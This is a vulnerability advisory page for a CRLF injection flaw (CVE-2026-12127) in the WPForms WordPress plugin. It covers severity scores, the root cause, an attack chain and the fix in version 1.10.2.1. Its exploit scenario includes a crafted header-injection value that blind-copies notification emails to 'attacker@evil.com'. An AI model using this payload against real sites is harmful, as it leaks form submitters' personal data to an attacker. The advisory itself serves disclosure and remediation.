Skip to main content

WPForms EUVDEUVD-2026-40907

| CVE-2026-12127 MEDIUM
Improper Neutralization of CRLF Sequences ('CRLF Injection') (CWE-93)
2026-07-01 Wordfence GHSA-95c2-pg6v-7hqp
5.3
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
5.3 MEDIUM
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
vuln.today AI
4.8 MEDIUM

AC:H reflects the required non-default admin configuration as a gating precondition; C:L added because notification email content including PII is disclosed to the attacker via Bcc injection.

3.1 AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 01, 2026 - 05:32 vuln.today
CVE Published
Jul 01, 2026 - 04:32 nvd
MEDIUM 5.3

DescriptionCVE.org

The WPForms - Easy Form Builder for WordPress - Contact Forms, Payment Forms, Surveys, & More plugin for WordPress is vulnerable to Improper Neutralization of CRLF Sequences ('CRLF Injection') in all versions up to, and including, 1.10.2 This is due to get_reply_to_address() processing the Reply-To display name through smart-tag expansion with context 'notification' instead of 'notification-reply-to', which bypasses email-address validation while wpforms_sanitize_textarea_field() intentionally preserves CR/LF characters that are never stripped before the display name is concatenated into the raw Reply-To: mail header string. This makes it possible for unauthenticated attackers to inject arbitrary additional email headers - such as Bcc: - into outgoing notification emails, silently blind-copying all notification email copies to an attacker-controlled address. Exploitation requires that a form notification is configured to use a Paragraph Text (textarea) field as the Reply-To display name via a Smart Tag.

AnalysisAI

CRLF injection in WPForms plugin for WordPress (all versions up to and including 1.10.2) enables unauthenticated attackers to silently blind-copy all site notification emails to an attacker-controlled address. The flaw originates from get_reply_to_address() applying the wrong smart-tag expansion context, allowing CR/LF characters preserved by wpforms_sanitize_textarea_field() to pass unstripped into raw mail header concatenation. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Submit form with CRLF-injected textarea value
Delivery
Wrong smart-tag context bypasses Reply-To address validation
Exploit
wpforms_sanitize_textarea_field() preserves CR/LF in display name
Execution
CRLF sequences concatenated unstripped into raw Reply-To mail header
Persist
Arbitrary Bcc: header appended to outgoing SMTP message
Impact
All form notification emails silently copied to attacker-controlled address

Vulnerability AssessmentAI

Exploitation Exploitation requires that a site administrator has explicitly configured a form notification to use a Paragraph Text (textarea) field as the Reply-To display name source via a WPForms Smart Tag (e.g., a `{field_id="N"}` Smart Tag pointing to a textarea-type field). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The reported CVSS 3.1 score of 5.3 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) accurately reflects network accessibility and the absence of authentication requirements, but the C:N rating understates real-world impact: successful exploitation silently copies all notification emails - which typically contain form submission data including PII such as names, contact details, and message content - to an attacker-controlled address, representing a genuine confidentiality breach that warrants at minimum C:L. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker identifies a WordPress site running WPForms where a public-facing form has been configured to use a Paragraph Text (textarea) field as the Reply-To display name via a Smart Tag - a configuration sometimes used to dynamically echo a submitter's freeform name into the reply header. The attacker submits the form with a crafted textarea value such as `Attacker Name Bcc: attacker@evil.com`, which passes through `wpforms_sanitize_textarea_field()` with the CRLF intact and is concatenated unstripped into the outgoing `Reply-To:` header. …
Remediation Update WPForms (wpforms-lite) to version 1.10.2.1 or later, which addresses the CRLF injection by correcting the smart-tag expansion context in `get_reply_to_address()` and ensuring CR/LF characters are stripped before header concatenation, as confirmed by the WordPress plugin repository changeset at https://plugins.trac.wordpress.org/changeset?old_path=%2Fwpforms-lite/tags/1.10.2&new_path=%2Fwpforms-lite/tags/1.10.2.1. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

EUVD-2026-40907 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy